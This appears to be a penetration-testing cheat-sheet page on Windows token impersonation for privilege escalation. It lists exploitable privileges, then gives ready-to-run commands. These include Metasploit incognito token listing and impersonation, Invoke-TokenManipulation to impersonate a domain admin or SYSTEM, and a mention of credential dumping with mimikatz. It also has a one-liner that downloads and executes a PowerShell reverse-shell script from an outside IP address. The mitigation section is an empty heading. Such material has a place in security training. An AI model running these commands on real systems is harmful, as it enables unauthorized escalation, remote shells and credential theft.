Token Impersonation
Token impersonation is a technique through which a Windows local administrator could steal another user’s security token in order to impersonate and effectively execute commands as that user.
That are certain privileges in Windows that, if enabled, could lead to an attacker escalating privileges to SYSTEM or any other user account with an active and valid token on that system, through various tools that have been designed to specifically exploit this vulnerability.
Exploitable Privileges
Certain privileges can be exploited to either escalate privileges directly to SYSTEM or to perform actions that are normally restricted. The privileges listed below can grant direct admin access when exploited:
SeAssignPrimaryToken
Admin
3rd party tool
SeImpersonate
Admin
3rd party tool
SeBackupPrivilege
Admin
3rd party tool
SeBackup
Threat
Built-in commands
SeCreateToken
Admin
3rd party tool
SeDebug
Admin
PowerShell
SeLoadDriver
Admin
3rd party tool
SeRestore
Admin
PowerShell
SeTakeOwnership
Admin
Built-in commands
SeTcb
Admin
3rd party tool
full list is here:
Using Metasploit
in your meterpreter shell load incognito module:
load incognitolist available tokens:
list_tokens -uImpersonate Administrator:
impersonate_token megacorp\\administratorInvoke-TokenManipulation
Invokes token impersonation as a domain user. If this doesn't work you can try impersonating SYSTEM and then dumping credentials using mimikatz.
Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser"
Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"
Get-Process wininit | Invoke-TokenManipulation -CreateProcess "cmd.exe"As a replacement for the last command you could do, but be vary of special characters in the command like " and '
Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};"Other Techniques
Mitigation & Detection
Last updated